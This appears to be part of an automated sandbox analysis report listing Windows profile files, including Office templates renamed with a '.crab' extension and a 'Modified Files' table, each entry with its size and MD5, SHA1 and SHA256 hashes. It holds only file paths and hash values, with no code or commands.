c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328983[[fn=theme picture alternating accent]].glox.crab 6.02 KB MD5: 3a5287118dcdce143e892c08edb5f41e
SHA1: b6d77ac878cdcf6dc65a48ce5942429eb7aa4901
SHA256: 3d0c69b04acdfe8095fb2da534d655b90e6963c85d3c7f0c1d6a79cf905eb100 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328986[[fn=theme picture grid]].glox.crab 6.58 KB MD5: 8d080a225a342e59d2e903077cd8ade2
SHA1: 8ff8379435f7cd191fe5ed7a2e3a2609293af53f
SHA256: 6e67cf55d3dea09524b4a8e392d25ebab6d61ac6bb83d6a151bfe42174707b26 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328990[[fn=varying width list]].glox.crab 3.53 KB MD5: 00083f810194ec80949ea2b015deb10a
SHA1: 8c05ef9d80129a24c205b88f59d3c1ff7c460597
SHA256: 01715d366fa966d99797f59fa1f915d63882bc3eca9422ce1e6071fd57d11892 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\tm03328998[[fn=rings]].glox.crab 5.55 KB MD5: 7b5463e779c711141bdb0aab95e6c291
SHA1: 31df7fa39a30c29bc7277132e3c015111e245f85
SHA256: 361e1f51dedfdc09067da71162bc5f157c6fbef0939389b471a2d8eae0fa501e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851216[[fn=apasixtheditionofficeonline]].xsl.crab 325.97 KB MD5: 3f7678f540f2feebf27d6ae9187ee201
SHA1: 7b37f9e01b0f6943b8b0f20543d86a2349dbf0f5
SHA256: 5230eee8d3b9babf936d7b07aaf5b6d4cf91e44ca6273c7eba80cd995997cca1 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851217[[fn=chicago]].xsl.crab 290.23 KB MD5: 7c9bab85dc6f44b0680870236dc39797
SHA1: 6a4490193648de3a10a2651d4c0b7859d1ab7ca9
SHA256: 192ba13f790df8e2ddbf36abb23675c6538da6edc1e435701694aafd9e2461cb 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851218[[fn=gb]].xsl.crab 262.55 KB MD5: 3813e117db4e799353de8276040b766f
SHA1: db184f39e76e62672814a03bb41d293141bbd2c1
SHA256: f92abd100dc162b2ba2d2a38f6611d1918c0a9aa9bd8cc6a819b94bfb8c9019e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851219[[fn=gostname]].xsl.crab 250.47 KB MD5: b1aa46c87dc394a091e2a55110200a9b
SHA1: 6f55b2afafeb26ae792e70c0e8cffaa372b60812
SHA256: 348ce98e1dfcfe6106cbc6ad1a57721d54b16d018b921cf5ac5888d64bd105e8 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851220[[fn=gosttitle]].xsl.crab 245.67 KB MD5: f5eb849610408d7bc90b352a583c9429
SHA1: 1a6c2c0ef4c95b9a40669b89bc484871ebccd65d
SHA256: d38622af4b4854bd60ebf74778ccda9bf60f1948b88d4425f94a6d8349875513 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851221[[fn=harvardanglia2008officeonline]].xsl.crab 278.27 KB MD5: 2ce52392f75c2a1c91bf934bc9abcfc7
SHA1: 9c01a309d640215edc93a67c6a2ced756dcb33e5
SHA256: 4f8945769454598b2deac94cc77fbe988a4dbc8a298ea4792478e5997f1d63e9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851222[[fn=ieee2006officeonline]].xsl.crab 287.81 KB MD5: c318ee90423b931bd4cb146deeb53295
SHA1: c1381fe7719896a21d6b2ac340224728d28ef610
SHA256: 0d4099b710ed54a47a2ecda28a1cc0284c0230988fa46044471a107e9df4e184 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851223[[fn=iso690]].xsl.crab 264.39 KB MD5: 51a4d4d28d7cc5a5eef8212bee0fa975
SHA1: e832d5deaeac4ecd43953a59c76aac9f924a504f
SHA256: c5ef49dee0bd8dd02e4c8bc0e3824b673a097a9fc7009fc562efb8df1aab03b9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851224[[fn=iso690nmerical]].xsl.crab 212.58 KB MD5: 379d083a1602eee30923c25a8031a9d0
SHA1: c840d2751a91ec18b8666507e212f71fe49bfed6
SHA256: 9a94a549d2df12ea627b1e4eb19f92ccf17ff5fe7e830c2d33449904b45ab87f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851225[[fn=mlaseventheditionofficeonline]].xsl.crab 249.42 KB MD5: 4b2043e07bdf5596e6197487f9f40d34
SHA1: 8e62bffd6f0c95864f45b0b1babdb9cc4a2ee4fa
SHA256: 9b9bec6b49991d9a439ca510b1de52021cea0bb8960669ea22af4518c2b8f4ab 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851226[[fn=turabian]].xsl.crab 336.75 KB MD5: 44062a35b792b4bf1e57e17a325058ee
SHA1: f7dd767a91869f10f978f2fc79d571df9ead2ad9
SHA256: 82ae22d960a05e49e6b310f9207cdd49d429cea525059bcefb08256bafb289f2 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document bibliography styles\tm02851227[[fn=sist02]].xsl.crab 245.62 KB MD5: be9be8e8185b1db91ee795e30c85f256
SHA1: 005003743237d086c1c3ee11fb86030bc314ab35
SHA256: 92c2d90539a79c193613f76edf4208c59c70adc5de101e0dc0ef21ac794bc2b8 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm01840907[[fn=equations]].dotx.crab 51.14 KB MD5: c0f7cf1e3a872e16426d93beb364e06b
SHA1: 75b1316d4c8f93c7d49768e7b5e835c850985b3c
SHA256: bb4a654c0f191513789f4f013f1122b1cbaeac16dcdbef6d71a79f2de448f01a 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835231[[fn=text cover with toc (student report blue design)]].docx.crab 60.73 KB MD5: b869abad1cb2199f2195b4b5ec4d462a
SHA1: 52098cf58ca2901d5a40d58dd59784d53213eeca
SHA256: 3f9e268bb8cd8d4d5190cda23992125947e255ac902b43c0e51418684ef9f492 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835232[[fn=text cover (student report blue design)]].docx.crab 57.17 KB MD5: fa72bf3a655b4c5affc16a70a93bea15
SHA1: ccab411d9d9cd942d51c88b2f7cd91eda572c60c
SHA256: 8073145784513807066d12a4b5548c5f43bbd757078f96e1fd808dfe4a25bfc3 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835233[[fn=text sidebar (annual report red and black design)]].docx.crab 46.70 KB MD5: 78e72cd292c5351eca5a8375a13457e6
SHA1: 2a3ed44e144636294684441b40f0036ae3820fa5
SHA256: 5af907563eba64470e8671bd0043a88a7bb0641215a7761d3e312d7b8f85e621 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835264[[fn=cover page (annual report red and black design)]].docx.crab 58.22 KB MD5: e673fd9791f449b78ba95a84be2c3e45
SHA1: 49b1ff7ffa4a651dad8258802be372915ccb1245
SHA256: 23dced46bccd630948415d819aac4135629e178bedf6ff80785534f8ca5b1754 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835265[[fn=cover page (annual report timeless design)]].docx.crab 57.66 KB MD5: 6e26733cbce8340543b8eb230088fef6
SHA1: 1e188f87bc4dec473b7756285fe29de238f4d931
SHA256: f52af90c611a18e2c8f51635d42bff50e4162ba1fd8da13f43962654942cf198 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835266[[fn=cover letter (chronological resume simple design)]].docx.crab 56.11 KB MD5: 0e39b656e93e1f2d94474fc53ce861f4
SHA1: 5fa79a49ebcd3d308b475323afb1e8bdce0aa648
SHA256: 50c22d6a352e410ba7c7a735115ac3bff327158e7640659c3100e720d3726521 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835267[[fn=cover with logo (annual report red and black design)]].docx.crab 62.42 KB MD5: 1256509515d9827654d834f1184d3f7a
SHA1: 6008657a375eb6430ea942b8fe5029a87b49564d
SHA256: 533091ded7c4fcaef3fae1b8032b61eb5991345dc27cc6146b12595ec8568277 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835268[[fn=photo cover (student report blue design)]].docx.crab 314.64 KB MD5: 14b5315288999531d81f9314e7e34776
SHA1: f44a6a7ccd4ac23dfe6831816e3a12e2627c69c8
SHA256: d601b2996924f0f8fd2bcd3524b03bcaa4c18e35a7f018d75af8bca9c0ec4a1e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835269[[fn=photo cover with toc (student report blue design)]].docx.crab 307.30 KB MD5: eab6473a699d1159127435b25e8bc96c
SHA1: 6d98a3ce80d7e37ff2915d29315a5283d22472c7
SHA256: 243adc5ea466e188024d5c4fbd7efd2015d416af72f7c588122f9f0f1d3057ba 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835270[[fn=photo sidebar (annual report red and black design)]].docx.crab 226.34 KB MD5: d53cd613cffabd7504960f313af39bfd
SHA1: cf82d8f7ed6e7d1f179a0372a8715ce2ea0781ab
SHA256: 37a0d1fd5249d3b46754cc02db73add8ef6633935f289c6f0d072c55e3ae31c6 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835271[[fn=sample table (annual report red and black design)]].docx.crab 29.44 KB MD5: 25e86197f269606061e99c525b826b9d
SHA1: fb1fb02b7866d5d58e7863e39ac1fe52af7b4c1c
SHA256: 08e70e5b5086a7850624dd67a23db8546e9a014e3b84194cc143d9c6d4e75960 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02835272[[fn=sample table (annual report timeless design)]].docx.crab 44.88 KB MD5: 61388293531b46cd5f842f527b2f9c4f
SHA1: 7e6c8d8ee04c8bd786a38e503a833b087cb480ae
SHA256: fba55f3ce489ff3e3cfd43287a9c69c11d80c8480f0075dda9a0e517670455b0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm02836362[[fn=cover letter (resume timeless design)]].docx.crab 50.31 KB MD5: 22854804b436b218cc99ab26875eb0a0
SHA1: 1b127643d3a961e45bdd3e0d27e7fa12462d8fbc
SHA256: 7bd6a51d444bdd7104c5ca3f528e03cc79e4c6c15d65c8158d7cef38669fe969 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998158[[fn=element]].dotx.crab 34.12 KB MD5: 612b1dc58dbcfbfd17bfad854fb703f5
SHA1: 724806bfdeba99459533cb105f7444d23bd86283
SHA256: 950496b0baa7be92a9ebc70acf6e40b02ffe0ae7db72b674741fd97002dce3f0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\word document building blocks\1033\tm03998159[[fn=insight]].dotx.crab 2.10 MB MD5: be5b4996fd89147059141be0f4f7aaad
SHA1: d6d318d3d3b7585dda2417a77dc05928573c500d
SHA256: e03a9bb3500e1ebb9a09e27b3eb88784bf500357200bf38245364db6f267a7c0 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\nd9e1fyi\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2172869166-1497266965-2109836178-1000\a3a72e03247cb64a84a5882930d7f45c_94f34c22-5cd3-4d50-aa5e-52adff408a05 0.05 KB MD5: 884bb48a55da67b4812805cb8905277d
SHA1: 6b3d33e00f5b9deae2826f80644cb4f6e78b7401
SHA256: 78877fa898f0b4c45c9c33ae941e40617ad7c8657a307db62bc5691f92f4f60e 		False
...
c:\$recycle.bin\s-1-5-21-2172869166-1497266965-2109836178-1000\$ipewi8i.tmp 0.67 KB MD5: 9126296e0dcaf851df5209121867f433
SHA1: e8cabfbab7c89afc8f8c5a2cab6316eb338db5fa
SHA256: bde73da1e1a47653bc41c876383655184b8c176fe4f3d991a4e0a22de751e026 		False
...
c:\users\nd9e1fyi\appdata\roaming\27yji_tg_wmdvk-.gif 3.00 KB MD5: 33b37811e300cd38fd42ee4595e64a7a
SHA1: 13a299124374d056be60ad69363b0d61a61bba94
SHA256: 0943f228aaba2fdb420dae8af3705520ae645c4f5c9128d7202a1ecbce49e50f 		False
...
c:\users\nd9e1fyi\appdata\roaming\2kxnzgrrl.doc 75.27 KB MD5: 0925ae510c00843e8ff004dcd205ad55
SHA1: 13d2e372537974ae87bf0beacf52fabb8bf16bfe
SHA256: 5d6434586875c05706540c9cd8f9f507ae0cfeeb9debf5ef47ef1cf69a9f56cb 		False
...
c:\users\nd9e1fyi\appdata\roaming\57vfxi.wav 27.66 KB MD5: 57d39e8e934f486ce2df553b8b37cefb
SHA1: 6f88945811525cd707f139d8acaf24b0c4bb7c32
SHA256: 0acf88959fd6d0b83eed505404f3054aeb4efa76852d09cc63aad4fc40f57afb 		False
...
c:\users\nd9e1fyi\appdata\roaming\7y338ww30khw_kvdj.bmp 92.70 KB MD5: 73aa67b6c11cb8e4e3d9a5ae9e12b7db
SHA1: 5e074b352b05c7e0f14cfa90cc39529742370023
SHA256: a9a4fc09573596b03c01eb43953db285750d41ed3cfc34fc5edd3021f96e020f 		False
...
c:\users\nd9e1fyi\appdata\roaming\80naubl1bcqq.mp3 2.52 KB MD5: 2ec9e11e00d2cf8d0c49b4f1e143178f
SHA1: aa0cee6278ad02cf49fb121cc2632fa124bce608
SHA256: 3eb0079a1b3d5a29c7fe1cb0ef849f01f9ff6c7474f39a9ed95069c17f52a9b1 		False
...
c:\users\nd9e1fyi\appdata\roaming\9hqb6.gif 34.05 KB MD5: f19b4b0480a637a87e8e65a12b15987c
SHA1: 2d9bd346f04a49ee8c50811c8ae4e4c4674639a4
SHA256: c7e2b6295b7b77ca2518fef935b429074004e45dd638a5bb08d3608854259c12 		False
...
c:\users\nd9e1fyi\appdata\roaming\ad456ynae.png 31.19 KB MD5: b3e9dec2280047385d315d862dbeed9b
SHA1: ae478640536d46e333c43f2841d23f3e43733d9f
SHA256: 464d2602d76d629350d377995403fd8379c59f32211b8514579f98b66711c4f2 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\addressbook.acrodata 8.20 KB MD5: 9556ec253b68d3316da8ce5805124195
SHA1: 0ae6967e9b17f83525ebd1b2a68dd1bbbbb3bafb
SHA256: e7ea07c3c3edeed4c2390e344c148f2d02f4d960e4de71e5b70c2eb85af03ca4 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl 1.14 KB MD5: 77c3dfeb6e7c910439ceb13793412d3a
SHA1: 01db9ff3c4f0644b703d32ca6a8e7b9f2dc323db
SHA256: 693ff4318218952cc39d4c6534eb81e7f2274d3dde4851f77d6a4882923f39b2 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl 0.94 KB MD5: 038f0d3fa4f6c30bda347e14daa5d509
SHA1: 3a63eda2be6bbde9ed8e92e299d32c3a070fa80c
SHA256: 1aff34b598561d6a511196a7de352e236109f0578c4912f64b2dac865a0f8f15 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logs\ulog_acrobat12_reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy 23.34 KB MD5: 422c175e6e571cf2e4492c0db57061ee
SHA1: 41bceed183f6ce224cc0dca9d925927dff29db0d
SHA256: 3316929aa2a8d8b7f24d4c2a963b098b542ea55227b541c628393e0565a7ae89 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\logtransport2\logtransport2.cfg 0.73 KB MD5: 5dacfa3f9df2e8f4348e0d45e9ceed74
SHA1: 84466badd7fc255dd0ae18bbff5b7340d94b856c
SHA256: 36c7c2d247c0313f9d1d96632ac13286b9ce48b5e424b50967a04fa884777fc8 		False
...
c:\users\nd9e1fyi\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml 18.84 KB MD5: e65e1a2c9c85016aa94dc6aa760c57e6
SHA1: d9ff601028219fccb785065fd3090fcd50f45e1f
SHA256: aa4a0f0ba0b26ad1dfe2840bf6d04784b8e96c51889200347283b0f8c73cdce3 		False
...
c:\users\nd9e1fyi\appdata\roaming\bc4ck.mp3 50.81 KB MD5: f3e9ec68a907777d38584fbbafa33563
SHA1: adc75a14ca07b283854561c5a71fc609b4cd83d6
SHA256: 3f4a5974e890e7a2423dcca139577b2a4d7277d4e2b24ced7fdab96f1c533987 		False
...
c:\users\nd9e1fyi\appdata\roaming\cx 2hvtjnepkc.mp3 38.58 KB MD5: 2fe501450902ecb586556d3185442805
SHA1: 659e60b75850cf04c0f01734e42f416457731bd6
SHA256: 2d33695032ec3724b21038dc5da2731483ff0b58d40cce695b0bb1f3071347ea 		False
...
c:\users\nd9e1fyi\appdata\roaming\d 3oihehyy3jgx.mp4 87.66 KB MD5: b844612a261fa35f563f6e8fed742891
SHA1: a0f80bc7662764fcaeb715321314b3de15bbd715
SHA256: e80b65c06b5701001337bb24061b55786d0d1e1792cd11861cd7b2987fa77d27 		False
...
c:\users\nd9e1fyi\appdata\roaming\dz28ghwyj9-jvurmnbqv.ots 97.72 KB MD5: 36b6019f59d531e698b09ff9340cab6c
SHA1: 3b86abf0f7962fd32b76222ef324c9a8843a6a12
SHA256: a0328766660c9dc51a52bcd4e4acb62df7ee5d242411eb4915ac541e363c13ee 		False
...
c:\users\nd9e1fyi\appdata\roaming\fezrnjyet8dxbnlxa.mp4 29.58 KB MD5: b1c736b29b0e697b2d0d1090a003aed1
SHA1: 62c0f72a8194fb4d78be4d6f273bd81bbc60d829
SHA256: f10af594f52228588d6867e4fb1bae7ba0a436b1b2a28dc2a4244abaea651a4c 		False
...
c:\users\nd9e1fyi\appdata\roaming\fkoq.odt 85.09 KB MD5: a67864437f7df752af8067739eb9fead
SHA1: 5c68c6248fb43d41c415433277e55d0ad6da4890
SHA256: 87b90562688bebe43710921a5a3ef8b5787ee17ed516a326020b8ebd1337a635 		False
...
c:\users\nd9e1fyi\appdata\roaming\gflne6eca1jmfg6m8.mkv 87.67 KB MD5: 254a59ce4a44e6a2ccddcdcdebd0b2bd
SHA1: 5fa896a2497bcec5a80dcd1e7ca6a719568e088e
SHA256: bab8f84304e72431acadc45dd0348f9da39c723a4e22cc5c785dae5a2d482f18 		False
...
c:\users\nd9e1fyi\appdata\roaming\im-xi-txjujxu8gwjean.avi 51.70 KB MD5: cc02aad286bbc55c846334b9fcf97c23
SHA1: 2bca1d93c5a0921a9d7cc175bbba1128b015d127
SHA256: 8346acc9eb71d7ea8c9e5c6349400f8a3511a3a9c51787ee853b562c84c39c05 		False
...
c:\users\nd9e1fyi\appdata\roaming\ivmnctwjms.swf 98.47 KB MD5: 0ef0cc6639cce2a58068f5728f29cfb8
SHA1: 9984d40ab0cac952cce1567dd572c60c8795873a
SHA256: 36c9e35afb1b56487098e9d116967099c08218dd1379e5f21c41845c6521883a 		False
...
c:\users\nd9e1fyi\appdata\roaming\je8o8wzi8buok7-5nx6.m4a 8.41 KB MD5: d82980ee504e39e8b872bf5c544ded94
SHA1: 67509d96388c9e4549839eb26a2457afba8e6554
SHA256: 8e4af37c3738adaa3e7d8cff2d1100b0b347968265695a47bf6a5a819076a95f 		False
...
c:\users\nd9e1fyi\appdata\roaming\kdoskm.avi 5.95 KB MD5: a7b942969f1bf68b179aeae423e4d378
SHA1: 0630f7af67c4c94dde2d6ad8b8da03c9873a38a6
SHA256: ad084a7dec745f4a3aaee85b041cec212553d93610df37ac680a30dc9425debf 		False
...
c:\users\nd9e1fyi\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol 1.02 KB MD5: e2206511aff69f5b850d7ee6a919d27f
SHA1: ee4ca5d547dede4f68e1f0800bc49f1c8b25c09d
SHA256: 62d05c8600db2b0702a08a711fba484251fa50f6ee3ac750422c9a0acf04c121 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl 326.31 KB MD5: 61a3ee38ddc2f88dfc40025034077a92
SHA1: fb7e2435fd22aaef4d5b0d7056c8b470208bac10
SHA256: 051b6b195d37c676c45792a492e1a97b887682c33de73ef773fef87d75e4a383 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\chicago.xsl 290.58 KB MD5: f46785f453192d5fa1329a94665afe5f
SHA1: 1216204b959550a1a66e271cdb6073f6dacc1e2c
SHA256: 4e598970a4f86cc010ce3b21af510d4b8cea876b3f1a872f7f8fefccecd4f5b4 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gb.xsl 262.89 KB MD5: 57b717430663f711e0764f54f75b1171
SHA1: be1f3bb094b8f1498be1c1df96440c837dd00da7
SHA256: 153a5e3ce6252846f9523a2478e0ba07ad33477cdf6658f0a5d824e831e75010 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gostname.xsl 250.88 KB MD5: 804d9447d5d2bb18e587d344f3e2dfcb
SHA1: 80a928f7ff94f126a9e65afe6c6f29f211bd5d49
SHA256: 5d6fc9f27eb1eeb05e5009eb9e52b870fa68add981e1e375fb53a321db44ef99 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl 246.08 KB MD5: 3911c8d6204fe569e721de94f0012e17
SHA1: ef594d1e156346303d06abb45abbf01cfe9d7935
SHA256: f01dcde8c722bb53f3870f2ade6d178c6c3484540ed2237e034c55b3c6028c77 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl 278.66 KB MD5: 3839347e1addcada30ca46af95551fb6
SHA1: 820ef21437fb9dfc29447de715c26f5807bf29ed
SHA256: 022bac14a6f2e6627c0123173ade165e6bde76bcf171ba0abaa57b4c1bcf9333 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl 288.14 KB MD5: 0cb7b278cc858433c4a247def784e45a
SHA1: 77cd02cb67c5dce7d59716b98ccf3646a55d2331
SHA256: 001ed2b3f7bf57a61394d678d8e65a7fd20d16d26291355528b5cb7410093ea5 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\iso690.xsl 264.83 KB MD5: 355bff6c28a5f7534daa0d8acb1b5081
SHA1: 131cbc60972f1e53ba414340850852e0d7a60c92
SHA256: 8d85ac523e6689458187382686ea77a4e749d1b862e588e24fd8a73bf976e565 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl 213.00 KB MD5: d49957312865f0a5b9da55be60742991
SHA1: 7dc3002b0834874fc99ac7c06a1bd8a5402bc82f
SHA256: 96fc0864f529925fc710d58015cea830e68dcf982f8a1990ed99f6a7ca405d4e 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl 249.77 KB MD5: 84908043b8b4075593e2354ab53eba99
SHA1: 9262318a94cea1501eea1db22543e7d8e3acb989
SHA256: ba45ccf8eb13d6870268d83c2ee6965340570ab76de31cef292fab83d8c93cf9 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\sist02.xsl 245.97 KB MD5: e912d2fc3c9283572d218869dd8502f3
SHA1: 6399f35b2bc5412e5854e3d2ceb800997a4eec44
SHA256: 6d505e8e8d511f7a25d837c39f70e70fe5322a1e660833efe5cbcde776567fb0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\bibliography\style\turabian.xsl 337.11 KB MD5: a1c6df9aa0c2e4d5a7d0fff984a16941
SHA1: 614c5eb554473012e2d12a1753b97ba3d00d9807
SHA256: ea2d96a2846045199eddd79e4f3800cdaab5b068c6b292ea58755174aef5b096 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx 3.53 MB MD5: 03571da0bb80d64c6740abdc86f2747d
SHA1: 82e22d7a3c682d859a6098623b9232a94c26e2ea
SHA256: 307be3c2c5dffc70e0cef6bd9cc3ab84177c4bd7bdabdf7ce92cb39758cd59a8 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\mso1033.acl 37.38 KB MD5: 2ad3ef61650d42d6cd1e7d4d32a0bb41
SHA1: d6d2c8dd5bf597ac2b789c73537c9fc49969693b
SHA256: 25ecd528bab6b79c7dc44ac022195582f25b70563d12c8d8884508d468270df4 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\con2.lnk 0.80 KB MD5: cf34cf8fb6e6d884e433b5105620ad94
SHA1: abcb1662e23aab31e092cc3b2989a578d9195fdc
SHA256: 5b6224b3b725d33d463e8ab7b3292e8ab272a2bc859aaa83aa660b674c174457 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\index.dat 0.58 KB MD5: dd7637e5fad846ea1a9abc0da1a6a582
SHA1: e1e0bb8eb5d3a288e07f15e0705dda3720b18e8d
SHA256: 5ffe4661bf10d535e4213fd173a822e1a8e6bc8e9652fb23db661340836cc55f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\office\recent\templates.lnk 1.67 KB MD5: 8e3a05c869f45c42ed7d70d9edb95c80
SHA1: 582593ada3ec554cf46769497cb93d3730ccc3b8
SHA256: f1579d60c5b585d2b8d4f6f89b15bc4830baf59d196d53ddbe3ed5e9007d2b4f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\outlook.srs 3.02 KB MD5: 2b615e096959c120e49b3c6795053480
SHA1: f2979cfb451dd8ac49867873f1843522b6605813
SHA256: a5d74a406637373b6913bdae41df22a769a624762fecaa1f6095dc38b3f260ca 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\outlook\outlook.xml 2.81 KB MD5: 880b40cb7fda6e0c947f93d6f7d8295b
SHA1: fdff6cfca149248f52f19db1cb5964e40730ecf3
SHA256: 6b0e1782869f48951063dea5df7f8d4cb413e396a6048c7626020205089eecb0 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\publisher building blocks\contentstore.xml 0.69 KB MD5: 4dd2a758d59783a4eeb09cc3a04a622d
SHA1: 4e29aaca232e12721b3bd53f9faa4c0c968a41ba
SHA256: ca4ab65f795c9cdaf35fc89fe26f483b915aaf34d0357d8b7ec15e532ba31a3f 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\cashflow analysis.xltm 371.62 KB MD5: 6fbf4a75f316ffa5c06bd1d6e930d2b4
SHA1: 422d43d07965de56ea41654652cd4d661267df42
SHA256: 30b29fbd1522924f3957dbdc63701c9f2f23791b3b14d8944e9f2eddfe61f7ec 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02836342[[fn=ion]].thmx 1.74 MB MD5: de55d6587353d6bf651d31e57e39d9dc
SHA1: 470b17d26e4275bec3c555a1222676d91f509895
SHA256: c72b4845be666875977b608ae528ae63da2fa059d5ab535e734e09d89ebddadb 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02892315[[fn=wisp]].thmx 769.42 KB MD5: 96a1156f8b5fc937b9438013329b178e
SHA1: e48ad051719a7e83e1c61b2b44d27d393220c49b
SHA256: 0a66e6b45d194c7f73c84179bef2ec5460b4526a98106c376c12305337c538cb 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02900688[[fn=facet]].thmx 721.64 KB MD5: e6e7256fb78bdae9a6b2c9ace28befbd
SHA1: d5961f2e7e829be513061d5464993ec9beb55438
SHA256: a40560a001a8d7604c55f22615157f5d4c62126cbde19264d77a5535c1db5b5a 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm02900771[[fn=slice]].thmx 845.06 KB MD5: cadb3c0da30291f89e092a5e02640bd0
SHA1: 8e76338061d3597f0b9794e634ca1a15c98b06f5
SHA256: df069e21bccf11b24ea9adc1d153086a1ccb634f5278fe7047c4cb29b450de40 		False
...
c:\users\nd9e1fyi\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090430[[fn=banded]].thmx 549.47 KB MD5: 81ef9a9b98cb8bde4b6f2773a49b5109
